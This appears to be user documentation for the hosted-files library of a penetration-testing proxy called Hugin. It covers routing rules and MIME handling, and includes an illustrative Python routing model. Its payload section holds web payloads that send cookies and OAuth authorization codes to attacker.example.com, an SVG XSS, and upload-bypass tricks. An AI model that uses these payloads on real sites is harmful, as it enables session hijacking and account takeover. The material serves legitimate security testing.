The Files view manages the hosted files library — static files that Hugin serves through the proxy port for payload injection. Drop a file here, and it becomes available at http://127.0.0.1:8080/hosted/<filename>.
Use it for XSS payloads, SSRF callback responses, file upload exploits, OAuth victim pages, anything that needs a fast, controllable URL during testing.
How Hosting Works
When the proxy receives a request whose Host header targets the proxy itself (127.0.0.1, localhost, or [::1]) and the path starts with /hosted/, Hugin intercepts the request and serves the matching file from the hosted directory.
Requests to /hosted/ paths on external hosts pass through normally — your hosted-file URLs only resolve locally.
The hosted directory is ~/.hugin/hosted/ by default. Files added through the UI are written there; files written manually to that directory are picked up automatically.
Adding Files
Drag-and-Drop
Drag any file from your OS file manager into the Files view. The file is copied into the hosted directory.
Add via Path
The + Add File button opens a file picker for one or more selections.
Paste Text
The + New Text File button opens a text editor — pick a filename and paste content. Useful for inline payloads, OAuth landing pages, JS payloads.
From Clipboard
Right-click in the table → Paste from Clipboard — creates a file from clipboard text or image content.
File Operations
Per row:
- Copy URL — copies http://127.0.0.1:8080/hosted/<filename> to clipboard
- Open — opens the file in your default OS handler
- Edit — for text files, opens the inline editor
- Rename — renames in place (URL changes too)
- Delete — removes from disk
MIME Types
Hugin guesses MIME from extension. Common types are mapped correctly:
- .html → text/html
- .js → application/javascript
- .svg → image/svg+xml
- .json → application/json
- .xml → text/xml
- .txt → text/plain
- Binary fallback → application/octet-stream
To override, edit the file’s metadata sidecar (per-file .json next to the file in the hosted directory).
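The two rules above (intercept only when the Host header names the proxy itself and the path starts with /hosted/; pick the MIME type from the extension, falling back to application/octet-stream, with a sidecar override) are easy to get subtly wrong, so here is a small Python model of that routing decision. This is example code written for this page, not Hugin's own source. Two things in it are assumptions: the sidecar is taken to be <file>.json beside the file with a "mime" key (the page only says a per-file .json sidecar exists, not its schema), and the resolver refuses any name that resolves outside the hosted directory, a containment check added here because the page does not say how Hugin treats ".." segments. The hosted library is simulated in a temporary directory with constructed files.

```python
from __future__ import annotations

import json
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Hosts for which /hosted/ paths are intercepted (as stated on the page).
LOCAL_HOSTS = {"127.0.0.1", "localhost", "[::1]"}
HOSTED_PREFIX = "/hosted/"

# Extension -> MIME table from the page; anything else is treated as binary.
MIME_BY_EXT = {
    ".html": "text/html",
    ".js": "application/javascript",
    ".svg": "image/svg+xml",
    ".json": "application/json",
    ".xml": "text/xml",
    ".txt": "text/plain",
}
BINARY_FALLBACK = "application/octet-stream"


def hostname_of(host_header: str) -> str:
    """Strip the port from a Host header, keeping IPv6 brackets ("[::1]:8080" -> "[::1]")."""
    if host_header.startswith("["):
        return host_header[: host_header.index("]") + 1]
    return host_header.split(":", 1)[0]


def is_hosted_request(host_header: str, path: str) -> bool:
    """Intercept only when the request targets the proxy itself AND asks for /hosted/...
    A /hosted/ path on any other host is forwarded untouched."""
    return hostname_of(host_header) in LOCAL_HOSTS and path.startswith(HOSTED_PREFIX)


def resolve_hosted_file(hosted_dir: Path, path: str) -> Path | None:
    """Map /hosted/<name> to a file inside hosted_dir.
    Assumption added here: names that resolve outside hosted_dir are refused."""
    name = unquote(path[len(HOSTED_PREFIX):].split("?", 1)[0])
    root = hosted_dir.resolve()
    candidate = (root / name).resolve()
    if root not in candidate.parents or not candidate.is_file():
        return None
    return candidate


def guess_mime(file_path: Path) -> str:
    """Extension-based guess with a per-file sidecar override.
    Assumed sidecar layout: <file>.json beside the file carrying a "mime" key."""
    sidecar = file_path.with_name(file_path.name + ".json")
    if sidecar.is_file():
        try:
            override = json.loads(sidecar.read_text()).get("mime")
            if override:
                return override
        except (ValueError, AttributeError):
            pass  # malformed sidecar: fall back to the extension guess
    return MIME_BY_EXT.get(file_path.suffix.lower(), BINARY_FALLBACK)


def route(hosted_dir: Path, host_header: str, path: str) -> tuple[str, str | None]:
    """What the proxy does with one request: ('passthrough', None),
    ('serve', mime) or ('not_found', None)."""
    if not is_hosted_request(host_header, path):
        return ("passthrough", None)
    target = resolve_hosted_file(hosted_dir, path)
    if target is None:
        return ("not_found", None)
    return ("serve", guess_mime(target))


def run_demo() -> dict[str, tuple[str, str | None]]:
    """Build a constructed hosted library in a temp dir and route sample requests."""
    with tempfile.TemporaryDirectory() as tmp:
        hosted = Path(tmp) / "hosted"
        hosted.mkdir()
        (hosted / "x.svg").write_text('<svg xmlns="http://www.w3.org/2000/svg"/>')
        (hosted / "blob.bin").write_bytes(b"\x00\x01")
        (hosted / "page.dat").write_text("<html></html>")
        # Sidecar forcing text/html for page.dat (constructed; assumed schema).
        (hosted / "page.dat.json").write_text(json.dumps({"mime": "text/html"}))
        (Path(tmp) / "secret.txt").write_text("outside the library")
        requests = {
            "local_svg": ("127.0.0.1:8080", "/hosted/x.svg"),
            "ipv6_binary": ("[::1]:8080", "/hosted/blob.bin?v=1"),
            "sidecar_override": ("localhost", "/hosted/page.dat"),
            "external_host": ("target.example", "/hosted/x.svg"),
            "missing_file": ("localhost:8080", "/hosted/nope.html"),
            "traversal": ("127.0.0.1", "/hosted/../secret.txt"),
        }
        return {k: route(hosted, h, p) for k, (h, p) in requests.items()}


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:18} -> {outcome}")
```

The external_host case is the property the Security section relies on: the same /hosted/x.svg path on any host other than the proxy itself is passed through, so a file in the library is never served under a target's hostname.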
Common Payload Patterns
Stored XSS callback
xss.html:
<script>fetch('https://attacker.example.com/x?c='+document.cookie)</script>
URL: http://127.0.0.1:8080/hosted/xss.html. Inject this URL anywhere the target loads HTML (e.g., as iframe src).
SVG XSS
x.svg:
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
Served with image/svg+xml MIME — bypasses many image-only filters.
File upload bypass payloads
Drop a polyglot GIF/PHP, double-extension files, or null-byte filename variants into the hosted dir; right-click → Copy URL for use as upload sources.
OAuth victim page
victim.html:
<script>
const code = new URLSearchParams(window.location.search).get('code');
fetch('https://attacker.example.com/exfil?code=' + code);
</script>
Use as a victim page in OAuth redirect_uri injection PoCs.
Security
- The /hosted/ route is only intercepted when the request targets the proxy itself. Requests to external sites at /hosted/ paths pass through unmodified — so hosting xss.html doesn’t accidentally serve it from target.com/hosted/xss.html.
- The hosted dir is not exposed via the API server (port 8081). Only the proxy port serves these files.
- File contents are not scanned — the hosted dir is a payload library, treat it accordingly.
Search & Tags
The Files table supports search by filename and tagging for organisation. Common tags: xss, ssrf, upload, oauth, client-acme.
Related
- The [storage] config section controls the hosted directory path (configurable via HUGIN_HOME).
- The proxy chapter has a brief mention of /hosted/* interception under Hosted Files.
- For dynamic / scripted responses, use a Lua extension instead — extensions can synthesise responses from request context, hosted files cannot.